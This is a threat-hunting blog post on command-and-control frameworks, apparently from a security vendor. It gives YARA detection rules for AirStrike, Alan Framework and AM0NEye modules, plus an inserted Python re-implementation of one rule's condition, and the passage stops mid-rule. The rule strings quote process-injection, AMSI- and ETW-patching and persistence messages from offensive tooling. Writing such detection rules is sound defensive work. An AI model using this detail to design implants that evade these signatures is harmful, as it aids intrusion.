C2 Frameworks - Threat Hunting in Action with YARA Rules

Cyber Threat Intelligence

post-exploitation, yara, network defense, ttps, signatures

Intro

C2 frameworks, also known as Command and Control frameworks, are software or systems used by cybercriminals to maintain control over compromised machines or networks. These frameworks provide a centralized platform for controlling multiple compromised systems within a target network and are used in real-world cyber attacks.

It's important to note that C2 frameworks are not inherently malicious. Ethical hackers and red teamers also use them to test network defenses. However, in the hands of bad actors, C2 frameworks can be used for malicious purposes. That may explain why frameworks like Cobalt Strike attract so much interest from both sides, white hats and Dark Web actors alike, especially as initial access brokers (IABs) misuse them.

Last year, Microsoft led an effort to stop cybercriminals from abusing security tools, including C2 frameworks. Microsoft's Digital Crimes Unit (DCU) took technical and legal action to disrupt cracked, legacy copies of Cobalt Strike and to address the abuse of Microsoft software, which cybercriminals have used to distribute malware, including ransomware. This remarkable action could set a positive precedent against a cybercriminal ecosystem that widely uses such tools for malicious purposes.

For educational purposes, Resecurity has developed sample YARA rules for various C2 frameworks to assist network defenders. This information may also be useful for red team specialists in planning potential evasion tactics when conducting vulnerability assessments and penetration testing (VAPT).

- Airstrike C2
- Alan Framework
- AM0NEye
- Atlas C2
- BruteRatel
- C3 (Custom Command and Control)
- Callidus
- DBC2
- Deimos C2
- GrimReaper C2
- FlyingAFalseFlag C2
- Mike C2
- Nimbo C2
- NorthStar C2
- Petaq C2
- Pickle C2
- Posh C2
- Reddit C2
- Sharp C2
- Trevor C2
- SQLC2

This material will open a new chapter in the future of threat hunting educational content from Resecurity, enabling network defenders to develop better detection practices. In fact, there are over 145 different C2 frameworks, each enjoying a different level of popularity among threat actors. To learn more about them, we highly recommend researching the C2 Matrix project, kindly developed by Jorge Orchilles (SANS Principal Instructor, Author, and Red Team and Purple Team Ambassador), Bryson Bort (Founder of SCYTHE), and Adam Mashinchi (Principal Product Manager for Managed Detection and Response at Red Canary).

The content Resecurity provides here therefore illustrates only a small part of the potential research area. C2s are widely used by adversaries in the post-exploitation stage, where, in practice, the actor prefers to minimize both network communications and any modules that could be detected by signatures. This tendency creates a real challenge for detection. Adversaries are well aware of both signature-based and behavior-based (fileless) detection methods and continuously design new TTPs to bypass and evade them.

How Bad Actors Use C2 Frameworks

Malicious actors use C2 frameworks in several ways:

1. Maintaining control over compromised systems: Bad actors use C2 frameworks to maintain control over compromised systems for extended periods, allowing them to increase the potential for damage.

2. Performing post-exploitation tasks: C2 frameworks provide capabilities for performing post-exploitation tasks, such as maintaining access to systems and working collaboratively with others to achieve their objectives.

3. Using external hacking tools: C2 frameworks support the use of external post-exploitation hacking tools, allowing bad actors to tailor the framework to their needs using tools they are comfortable with.

4. Issuing instructions and downloading malicious payloads: Bad actors use C2 frameworks to issue instructions to compromised devices, download additional malicious payloads, and pipe stolen data back to themselves.

5. Customizing and evading detection: Adversaries can customize off-the-shelf C2 frameworks like Metasploit and Cobalt Strike to make detection more difficult. They can also use open-source frameworks like Sliver and Empire, which are gaining popularity among cybercriminals.

Overall, C2 frameworks provide a powerful toolset for bad actors to maintain control over compromised systems, perform post-exploitation tasks, and evade detection. Their functionality and flexibility make them attractive to both red teamers and malicious actors.

Threat Hunting

C2 frameworks are used by attackers to establish communication channels with compromised systems and issue commands to carry out malicious activities. Detecting C2 frameworks is crucial for identifying and mitigating cyber threats. Here are some techniques and indicators that can help in detecting C2 frameworks:

1. Network Traffic Analysis: C2 frameworks often rely on network communication to establish connections and exchange commands. Monitoring network traffic for suspicious patterns, unusual protocols, or unexpected connections can help in detecting C2 activity.

2. DNS Filtering: C2 frameworks may use domain names for communication. Implementing DNS filtering services can help prevent C2 callbacks to suspicious or newly registered domains.

3. Beacon Detection: C2 frameworks often use beacons, which are periodic signals sent by compromised devices to the C2 server. These beacons can be a tell-tale sign of C2 activity. Intrusion Detection/Prevention Systems (IDS/IPS) can be configured to detect beacons associated with known C2 frameworks.

4. Anomaly Detection: C2 frameworks may exhibit unusual behavior or patterns that deviate from normal network traffic. Employing anomaly detection techniques, such as machine learning algorithms or statistical analysis, can help identify C2 activity based on deviations from normal network behavior.

5. Payload Analysis: Analyzing the payload of network traffic or files can provide insights into the presence of C2 frameworks. Malware analysis tools and techniques can be used to identify C2-related indicators, such as specific command and control protocols or communication patterns.

6. Behavioral Analysis: C2 frameworks often exhibit specific behavioral patterns, such as specific command execution or data exfiltration techniques. Monitoring for these behavioral indicators can aid in detecting C2 activity.

7. Threat Intelligence: Staying updated with the latest information on known C2 frameworks, their techniques, and indicators of compromise (IOCs) can help in proactive detection. Leveraging threat intelligence feeds and security research can provide valuable insights.

It's important to note that C2 frameworks can be customized and evolve over time, making detection challenging. Implementing a multi-layered security approach that combines network monitoring, anomaly detection, and threat intelligence can enhance the detection capabilities and improve overall security posture.

YARA Rules

To assist network defenders, Resecurity has developed several YARA rules for the most popular C2 frameworks. These rules may be modified, improved, and tailored to specific solutions, allowing the application of such rules or signatures to detect C2 activity.

- Airstrike C2

import "hash"
import "pe"

rule AirStrike {
   meta:
      description = "AirStrike - AirStrike-x64.exe, AirStrike-x86.exe"
      sha256_1 = "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9"
      sha256_2 = "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad"
   strings:
      $s1  = "[-] Copied shellcode to memory" fullword ascii
      $s2  = "[-] Received shellcode of size %d" fullword ascii
      $s3  = "username=%s&pid=%d&machine=%s&domain=%s&arch=%s&process=%s&version=%s" fullword ascii
      $s4  = "[+] Killing process" fullword ascii
      $s5  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s6  = "[-] Thread finished" fullword ascii
      $s7  = "[-] Created thread" fullword ascii
      $s8  = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" fullword ascii
      $s9  = "[-] Changed memory protection" fullword ascii
      $s10 = "[+] Request sent" fullword ascii
      $s11 = "[-] Received response of size %d" fullword ascii
      $s12 = "[+] Data: %s" fullword ascii
      $s13 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s14 = "X-Session-ID: %s" fullword ascii
      $s15 = "192.168.17.131" fullword ascii
      $s16 = ".rdata$voltmd" fullword ascii
      $s17 = "  </trustInfo>" fullword ascii
      $s18 = "[-] Allocated memory at %p" fullword ascii
      $s19 = "_get_initial_narrow_environment" fullword ascii
      $s20 = "_set_app_type" fullword ascii
   condition:
      // Either an exact hit on one of the two known samples, or a structural match:
      // the kernel32/crypt32/WinINet imports the loader relies on, plus either a small
      // PE (0x5a4d is "MZ") carrying 8 of the strings, or every string present.
      hash.sha256(0, filesize) == "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9" or
      hash.sha256(0, filesize) == "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad" or
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("crypt32.dll", "CryptBinaryToStringW") and
      pe.imports("wininet.dll", "InternetConnectW") and
      (( uint16(0) == 0x5a4d and filesize < 40KB and (8 of them)) or (all of them))
}


- Alan Framework

import "hash"
import "pe"

rule AlanFramework {
   meta:
      description = "AlanFramework - wqjs_x64.exe, wqjs_x86.exe"
      sha256_1 = "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0"
      sha256_2 = "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03"
   strings:
      $s1  = "proxy: target property must be present in proxy ownKeys" fullword ascii
      $s2  = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s3  = "Storage error: %d - '%s'" fullword ascii
      $s4  = "proxy: inconsistent getOwnPropertyDescriptor" fullword ascii
      $s5  = "proxy: property not present in target were returned by non extensible proxy" fullword ascii
      $s6  = "new.target only allowed within functions" fullword ascii
      $s7  = "GetTempPath2W" fullword ascii
      $s8  = "expecting target" fullword ascii
      $s9  = "circular reference when looking for export '%s' in module '%s'" fullword ascii
      $s10 = "Failed to read file header" fullword ascii
      $s11 = "getOwnPropertyDescriptors" fullword ascii
      $s12 = "operator %s: no function defined" fullword ascii
      $s13 = "new.target" fullword ascii
      $s14 = "out of memory in regexp execution" fullword ascii
      $s15 = "getenviron" fullword ascii
      $s16 = "curl -s -i" fullword ascii
      $s17 = "Failed to write header to the disk" fullword ascii
      $s18 = "invalid import binding" fullword ascii
      $s19 = "invalid descriptor flags" fullword ascii
      $s20 = "RegExp exec method must return an object or null" fullword ascii
   condition:
      hash.sha256(0, filesize) == "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0" or
      hash.sha256(0, filesize) == "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03" or
      pe.imports("kernel32.dll", "CreateProcessW") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "RemoveDirectoryW") and
      pe.imports("crypt32.dll", "CryptStringToBinaryA") and
      (uint16(0) == 0x5a4d and filesize < 3000KB and (8 of them)) or (all of them)
}


- AM0NEye

import "hash"

rule AM0NEye_AmsiInject {
   meta:
      description = "AM0NEye - amsi-inject.o"
      sha256 = "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852"
   strings:
      $x1  = "Fail - Could not patch AMSI.AmsiOpenSession in remote process: PID:%d" fullword ascii
      $s2  = "Success - Patched AMSI.AmsiOpenSession in remote process: PID:%d" fullword ascii
      $s3  = "amsi.dll" fullword ascii
      $s4  = "Attempting to patch AMSI in remote process with PID: %d" fullword ascii
      $s5  = "__imp_KERNEL32$OpenProcess" fullword ascii
      $s6  = "__imp_KERNEL32$WriteProcessMemory" fullword ascii
      $s7  = "amsi-inject.c" fullword ascii
      $s8  = "__imp_KERNEL32$GetProcAddress" fullword ascii
      $s9  = "__imp_KERNEL32$CloseHandle" fullword ascii
      $s10 = "__imp_KERNEL32$LoadLibraryA" fullword ascii
      $s11 = "patchAmsiOpenSession" fullword ascii
      $s12 = "__imp_BeaconDataInt" fullword ascii
      $s13 = "AmsiOpenSession" fullword ascii
      $s14 = "GCC: (GNU) 10-win32 20220324" fullword ascii
      $s15 = "P@.xdata" fullword ascii
   condition:
      // 0x8664 is IMAGE_FILE_MACHINE_AMD64: the target is a raw x64 COFF object (a
      // Beacon Object File), so the check is on the COFF Machine field, not an "MZ" header.
      hash.sha256(0, filesize) == "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852" or
      uint16(0) == 0x8664 and filesize < 5KB and
      1 of ($x*) and 4 of them
}
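
To show how a condition like the one in AM0NEye_AmsiInject actually behaves, here is an added example (my own code, not Resecurity's rule set and not part of the AM0NEye project) that re-implements that rule's condition in plain Python and runs it over a constructed COFF-like blob. It uses a subset of the rule's strings ($x1, $s3, $s5, $s6, $s11), a placeholder hash, and no yara-python; the point is to see the Machine check, the size cap and the fullword semantics decide a match.

```python
import hashlib
import struct

# String definitions taken from the AM0NEye_AmsiInject rule above (a subset is enough
# for the demonstration); the $x* strings are the "must have at least one" group.
X_STRINGS = {
    "$x1": b"Fail - Could not patch AMSI.AmsiOpenSession in remote process: PID:%d",
}
S_STRINGS = {
    "$s3": b"amsi.dll",
    "$s5": b"__imp_KERNEL32$OpenProcess",
    "$s6": b"__imp_KERNEL32$WriteProcessMemory",
    "$s11": b"patchAmsiOpenSession",
}

# COFF IMAGE_FILE_HEADER.Machine values, i.e. what the rules' uint16(0) checks compare against.
COFF_AMD64 = 0x8664  # x64 object file; used by the AM0NEye *X64 rules
COFF_I386 = 0x014C   # 32-bit object file; used by AM0NEye_EtwX86 / AM0NEye_UnhookX86
SIZE_CAP = 5 * 1024  # "filesize < 5KB" in the AmsiInject rule


def fullword_matches(data: bytes, needle: bytes) -> bool:
    """Emulate YARA `fullword ascii`: an occurrence counts only when the bytes
    immediately before and after it are not alphanumeric (YARA applies isalnum)."""
    start = 0
    while True:
        idx = data.find(needle, start)
        if idx < 0:
            return False
        before = data[idx - 1:idx] if idx > 0 else b""
        after = data[idx + len(needle):idx + len(needle) + 1]
        if not before.isalnum() and not after.isalnum():
            return True
        start = idx + 1


def evaluate_amsi_inject(data: bytes, known_sha256: str) -> dict:
    """Mirror the rule's condition. YARA gives `and` priority over `or`, like Python:
       hash.sha256(0, filesize) == known  or
       (uint16(0) == 0x8664 and filesize < 5KB and 1 of ($x*) and 4 of them)"""
    machine = struct.unpack_from("<H", data, 0)[0] if len(data) >= 2 else None
    x_hits = sorted(n for n, s in X_STRINGS.items() if fullword_matches(data, s))
    s_hits = sorted(n for n, s in S_STRINGS.items() if fullword_matches(data, s))
    structural = (
        machine == COFF_AMD64
        and len(data) < SIZE_CAP
        and len(x_hits) >= 1
        and len(x_hits) + len(s_hits) >= 4   # "4 of them" counts distinct identifiers
    )
    matched = hashlib.sha256(data).hexdigest() == known_sha256 or structural
    return {"matched": matched, "machine": machine, "x_hits": x_hits, "s_hits": s_hits}


def build_sample(machine: int, strings: list, padding: int = 0) -> bytes:
    """Constructed stand-in for a compiled object: a 20-byte COFF file header with the
    given Machine value, followed by NUL-separated strings. Not a real linkable object."""
    header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)
    return header + b"\x00".join(strings) + b"\x00" + b"\x00" * padding


def demo() -> dict:
    """Constructed cases showing which branch of the condition fires."""
    core = [X_STRINGS["$x1"], S_STRINGS["$s3"], S_STRINGS["$s5"], S_STRINGS["$s11"]]
    no_hash = "0" * 64  # placeholder; the real sample hash lives in the rule's meta
    hit = build_sample(COFF_AMD64, core)
    wrong_arch = build_sample(COFF_I386, core)
    # "xamsi.dll": the needle is present but preceded by an alphanumeric byte, so
    # fullword rejects it and the blob ends up one string short of "4 of them".
    glued = build_sample(COFF_AMD64, [X_STRINGS["$x1"], b"xamsi.dll",
                                      S_STRINGS["$s5"], S_STRINGS["$s11"]])
    # Oversized file fails the structural branch; only the hash branch can still catch it.
    big = build_sample(COFF_AMD64, core, padding=SIZE_CAP)
    return {
        "hit": evaluate_amsi_inject(hit, no_hash)["matched"],
        "wrong_arch": evaluate_amsi_inject(wrong_arch, no_hash)["matched"],
        "glued": evaluate_amsi_inject(glued, no_hash)["matched"],
        "big_structural": evaluate_amsi_inject(big, no_hash)["matched"],
        "big_by_hash": evaluate_amsi_inject(big, hashlib.sha256(big).hexdigest())["matched"],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The "big" case is the practical caveat: a recompiled or padded object slips past the size cap, and the hash branch only helps for the exact sample, so the string and import checks carry the real detection value.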

rule AM0NEye_EtwX86 {
   meta:
      description = "AM0NEye - etw.x86.o"
      sha256 = "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190"
   strings:
      $s1  = "__imp__KERNEL32$GetCurrentProcess@0" fullword ascii
      $s2  = "__imp__KERNEL32$ReadProcessMemory@20" fullword ascii
      $s3  = "ReadProcessMemory failed" fullword ascii
      $s4  = "__imp__KERNEL32$GetProcAddress@8" fullword ascii
      $s5  = "Failed to find function address" fullword ascii
      $s6  = "__imp__KERNEL32$LoadLibraryA@4" fullword ascii
      $s7  = "__imp__KERNEL32$VirtualProtect@16" fullword ascii
      $s8  = "__imp__BeaconDataExtract" fullword ascii
      $s9  = "__imp__MSVCRT$strcmp" fullword ascii
      $s10 = "__imp__BeaconPrintf" fullword ascii
      $s11 = "__imp__BeaconDataParse" fullword ascii
      $s12 = "Could not load library" fullword ascii
      $s13 = "__imp__MSVCRT$memcpy" fullword ascii
      $s14 = "Working with 32-bit." fullword ascii
      $s15 = "0`.data" fullword ascii
      $s16 = "GCC: (GNU) 10-win32 20220324" fullword ascii
   condition:
      // 0x014c is IMAGE_FILE_MACHINE_I386: the 32-bit build of the same object file.
      hash.sha256(0, filesize) == "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190" or
      uint16(0) == 0x014c and filesize < 6KB and
      8 of them
}

rule AM0NEye_FindModule {
   meta:
      description = "AM0NEye - FindModule.o"
      sha256 = "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4"
   strings:
      $s1  = "ExecuteSimpleSystemCallBase_Epilogue" fullword ascii
      $s2  = "EnumerateProcessModules" fullword ascii
      $s3  = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" fullword ascii
      $s4  = "ExecuteSimpleSystemCallBase_Finished" fullword ascii
      $s5  = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" fullword ascii
      $s6  = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" fullword ascii
      $s7  = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" fullword ascii
      $s8  = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" fullword ascii
      $s9  = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" fullword ascii
      $s10 = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" fullword ascii
      $s11 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" fullword ascii
      $s12 = "ExecuteSimpleSystemCallBase" fullword ascii
      $s13 = "IsElevated" fullword ascii
      $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" fullword ascii
      $s15 = "    ProcessID:   %lu" fullword ascii
      $s16 = "    ProcessName: %wZ" fullword ascii
      $s17 = "GetCurrentPid" fullword ascii
      $s18 = "SeDebugPrivilege" fullword wide
      $s19 = "FindModule.c" fullword ascii
      $s20 = "__imp_MSVCRT$_wcsicmp" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4" or
      uint16(0) == 0x8664 and filesize < 20KB and
      8 of them
}

rule AM0NEye_FindProcHandle {
   meta:
      description = "AM0NEye - FindProcHandle.o"
      sha256 = "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa"
   strings:
      $s1  = "ExecuteSimpleSystemCallBase_Epilogue" fullword ascii
      $s2  = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" fullword ascii
      $s3  = "ExecuteSimpleSystemCallBase_Finished" fullword ascii
      $s4  = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" fullword ascii
      $s5  = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" fullword ascii
      $s6  = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" fullword ascii
      $s7  = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" fullword ascii
      $s8  = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" fullword ascii
      $s9  = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" fullword ascii
      $s10 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" fullword ascii
      $s11 = "ExecuteSimpleSystemCallBase" fullword ascii
      $s12 = "IsElevated" fullword ascii
      $s13 = "Failed to obtain ProcessId..." fullword ascii
      $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" fullword ascii
      $s15 = "    ProcessID:   %lu" fullword ascii
      $s16 = "    ProcessName: %ls" fullword ascii
      $s17 = "GetPid" fullword ascii
      $s18 = "Process" fullword wide
      $s19 = "SeDebugPrivilege" fullword wide
      $s20 = "__imp_MSVCRT$_wcsicmp" fullword ascii
   condition:
      hash.sha256(0, filesize) == "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa" or
      uint16(0) == 0x8664 and filesize < 20KB and
      8 of them
}

rule AM0NEye_GetDomainInfo {
   meta:
      description = "AM0NEye - GetDomainInfo.o"
      sha256 = "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86"
   strings:
      $s1 = "__imp_NETAPI32$DsGetDcNameA" fullword ascii
      $s2 = "Domain Controller Address: %s" fullword ascii
      $s3 = "Domain Controller: %s" fullword ascii
      $s4 = "Domain Forest Name: %s" fullword ascii
      $s5 = "__imp_NETAPI32$NetApiBufferFree" fullword ascii
      $s6 = "DC Site Name: %s" fullword ascii
      $s7 = "GCC: (GNU) 10-win32 20220324" fullword ascii
      $s8 = "P@.xdata" fullword ascii
   condition:
      hash.sha256(0, filesize) == "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86" or
      uint16(0) == 0x8664 and filesize < 2KB and
      all of them
}

rule AM0NEye_RegistryPersistence {
   meta:
      description = "AM0NEye - RegistryPersistence.o"
      sha256 = "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643"
   strings:
      $s1  = "__imp_ADVAPI32$RegOpenKeyExW" fullword ascii
      $s2  = "Failed to open key  " fullword ascii
      $s3  = "Key deleted in registry, persistence removed. " fullword ascii
      $s4  = "__imp_ADVAPI32$RegCloseKey" fullword ascii
      $s5  = "Unsuccessful in opening key  " fullword ascii
      $s6  = "__imp_ADVAPI32$RegDeleteKeyValueW" fullword ascii
      $s7  = "Key opened " fullword ascii
      $s8  = "Key changed in registry, persistence installed " fullword ascii
      $s9  = "Key not changed in registry " fullword ascii
      $s10 = "Key not deleted in registry " fullword ascii
      $s11 = "Update" fullword wide
      $s12 = "Install" fullword ascii
      $s13 = "__imp_MSVCRT$strcmp" fullword ascii
      $s14 = "__imp_ADVAPI32$RegSetValueExW" fullword ascii
      $s15 = "Please use either an Install or Remove argument." fullword ascii
      $s16 = "RemovePersistence" fullword ascii
      $s17 = "InstallPersistence" fullword ascii
      $s18 = "Remove" fullword ascii
      $s19 = "Cannot find key value in registry " fullword ascii
      $s20 = "Key location open successful " fullword ascii
   condition:
      hash.sha256(0, filesize) == "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643" or
      uint16(0) == 0x8664 and filesize < 8KB and
      8 of them
}

rule AM0NEye_cThreadHijack {
   meta:
      description = "AM0NEye - cThreadHijack.o"
      sha256 = "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40"
   strings:
      $x1  = "[+] Wrote Beacon shellcode to the remote process!" fullword ascii
      $x2  = "[+] Target process PID: %d" fullword ascii
      $s3  = "[+] Successfully pointed the target thread's RIP register to the shellcode!" fullword ascii
      $s4  = "[+] Found a thread in the target process! Thread ID: %d" fullword ascii
      $s5  = "[+] Size of shellcode: %d bytes" fullword ascii
      $s6  = "C:\\Users\\ANON\\Desktop\\cThreadHijack\\cThreadHijack.o" fullword ascii
      $s7  = "__imp_KERNEL32$OpenProcess" fullword ascii
      $s8  = "__imp_KERNEL32$WriteProcessMemory" fullword ascii
      $s9  = "Error! Unable to set the target thread's RIP register. Error: 0x%lx" fullword ascii
      $s10 = "Error! Unable to write shellcode to allocated buffer. Error: 0x%lx" fullword ascii
      $s11 = "Error! Unable to get the state of the target thread. Error: 0x%lx" fullword ascii
      $s12 = "Error! Unable to open a handle to the process. Error: 0x%lx" fullword ascii
      $s13 = "__imp_KERNEL32$GetLastError" fullword ascii
      $s14 = "[+] Resuming the thread! Please wait for the Beacon payload to execute. This could take some time..." fullword ascii
      $s15 = "__imp_KERNEL32$GetThreadContext" fullword ascii
      $s16 = "[+] Suspending the targeted thread..." fullword ascii
      $s17 = "[+] Virtual memory for CreateThread and NtContinue routines allocated at 0x%llx inside of the remote process!" fullword ascii
      $s18 = "Error! Unable to allocate memory in the remote process. Error: 0x%lx" fullword ascii
      $s19 = "Error! Unable to allocate memory within the remote process. Error: 0x%lx" fullword ascii
      $s20 = "__imp_KERNEL32$GetModuleHandleA" fullword ascii
   condition:
      hash.sha256(0, filesize) == "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40" or
      uint16(0) == 0x8664 and filesize < 20KB and
      1 of ($x*) and 4 of them
}

rule AM0NEye_UnhookX64 {
   meta:
      description = "AM0NEye - unhook.x64.o"
      sha256 = "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe"
   strings:
      $s1  = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x64.o" fullword ascii
      $s2  = "$pdata$GetProcessEnvironmentBlock" fullword ascii
      $s3  = "$unwind$GetProcessEnvironmentBlock" fullword ascii
      $s4  = "GetProcessEnvironmentBlock" fullword ascii
      $s5  = "__imp_KERNEL32$GetModuleHandleW" fullword ascii
      $s6  = "__imp_KERNEL32$CloseHandle" fullword ascii
      $s7  = "__imp_KERNEL32$VirtualProtect" fullword ascii
      $s8  = "$unwind$GetRedirectedName" fullword ascii
      $s9  = "$pdata$GetRedirectedName_V4" fullword ascii
      $s10 = "$unwind$GetRedirectedName_V6" fullword ascii
      $s11 = "IsBeaconDLL" fullword ascii
      $s12 = "__imp_KERNEL32$CreateFileW" fullword ascii
      $s13 = "$pdata$GetRedirectedName_V2" fullword ascii
      $s14 = "__imp_KERNEL32$UnmapViewOfFile" fullword ascii
      $s15 = "__imp_KERNEL32$LoadLibraryW" fullword ascii
      $s16 = "$pdata$IsBeaconDLL" fullword ascii
      $s17 = "$unwind$GetRedirectedName_V4" fullword ascii
      $s18 = "$unwind$CustomGetModuleHandleW" fullword ascii
      $s19 = "$pdata$GetRedirectedName_V6" fullword ascii
      $s20 = "$unwind$IsBeaconDLL" fullword ascii
   condition:
      hash.sha256(0, filesize) == "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe" or
      uint16(0) == 0x8664 and filesize < 40KB and
      8 of them
}

rule AM0NEye_CurlX64 {
   meta:
      description = "AM0NEye - curl.x64.o"
      sha256 = "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206"
   strings:
      $s1  = "User Agent: %s" fullword ascii
      $s2  = "__imp_KERNEL32$lstrlenA" fullword ascii
      $s3  = "__imp_WININET$HttpSendRequestA" fullword ascii
      $s4  = "__imp_WININET$InternetReadFile" fullword ascii
      $s5  = "sendHttpRequest" fullword ascii
      $s6  = "Retrieving HTTP Request info failed" fullword ascii
      $s7  = "__imp_WININET$HttpOpenRequestA" fullword ascii
      $s8  = "__imp_WININET$HttpQueryInfoA" fullword ascii
      $s9  = "%s %s:%i %s" fullword ascii
      $s10 = "Response Code: %s" fullword ascii
      $s11 = "__imp_BeaconDataInt" fullword ascii
      $s12 = "__imp_WININET$InternetConnectA" fullword ascii
      $s13 = "__imp_MSVCRT$strtok" fullword ascii
      $s14 = "__imp_MSVCRT$strcmp" fullword ascii
      $s15 = "entry.c" fullword ascii
      $s16 = "No response." fullword ascii
      $s17 = "__imp_WININET$InternetCloseHandle" fullword ascii
      $s18 = "__imp_WININET$InternetOpenA" fullword ascii
      $s19 = "P@.xdata" fullword ascii
      $s20 = "GCC: (GNU) 10-win32 20200525" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206" or
      uint16(0) == 0x8664 and filesize < 10KB and
      8 of them
}

rule AM0NEye_EtwX64 {
   meta:
      description = "AM0NEye - etw.x64.o"
      sha256 = "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be"
   strings:
      $s1  = "__imp_KERNEL32$GetCurrentProcess" fullword ascii
      $s2  = "__imp_KERNEL32$ReadProcessMemory" fullword ascii
      $s3  = "ReadProcessMemory failed" fullword ascii
      $s4  = "__imp_KERNEL32$GetProcAddress" fullword ascii
      $s5  = "Failed to find function address" fullword ascii
      $s6  = "__imp_KERNEL32$LoadLibraryA" fullword ascii
      $s7  = "__imp_KERNEL32$VirtualProtect" fullword ascii
      $s8  = "__imp_MSVCRT$strcmp" fullword ascii
      $s9  = "Could not load library" fullword ascii
      $s10 = "Working with 64-bit." fullword ascii
      $s11 = "__imp_MSVCRT$memcpy" fullword ascii
      $s12 = "P@.xdata" fullword ascii
      $s13 = "GCC: (GNU) 10-win32 20200525" fullword ascii
   condition:
      hash.sha256(0, filesize) == "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be" or
      uint16(0) == 0x8664 and filesize < 6KB and
      8 of them
}

rule AM0NEye_ProcessHollowingX64 {
   meta:
      description = "AM0NEye - process-hollowing.x64.o"
      sha256 = "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d"
   strings:
      $x1  = "[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!" fullword ascii
      $x2  = "[+] Success - Spawned process for %s at %d (PID)" fullword ascii
      $x3  = "[!] Failure - Could not queue APC for main thread of %d (PID) to shellcode address 0x%p" fullword ascii
      $x4  = "[+] Success - APC queued for main thread of %d (PID) to shellcode address 0x%p" fullword ascii
      $x5  = "[!] Failure - Could not create a process for %s using CreateProcessA()" fullword ascii
      $s6  = "[+] Success - Wrote %d bytes to memory in remote process %d (PID) at 0x%p" fullword ascii
      $s7  = "[!] Failure - Could not allocate memory to remote process %d (PID)" fullword ascii
      $s8  = "[+] Success - Allocated RE memory in remote process %d (PID) at: 0x%p" fullword ascii
      $s9  = "[!] Failure - Could not write payload to memory at 0x%p" fullword ascii
      $s10 = "__imp_KERNEL32$WriteProcessMemory" fullword ascii
      $s11 = "[!] Failure - Could not resume thread." fullword ascii
      $s12 = "__imp_KERNEL32$CreateProcessA" fullword ascii
      $s13 = "__imp_KERNEL32$ResumeThread" fullword ascii
      $s14 = "__imp_KERNEL32$QueueUserAPC" fullword ascii
      $s15 = "__imp_KERNEL32$VirtualAllocEx" fullword ascii
      $s16 = "__imp_MSVCRT$memset" fullword ascii
      $s17 = "__imp_BeaconDataLength" fullword ascii
      $s18 = "hollow.x64.c" fullword ascii
      $s19 = "P@.xdata" fullword ascii
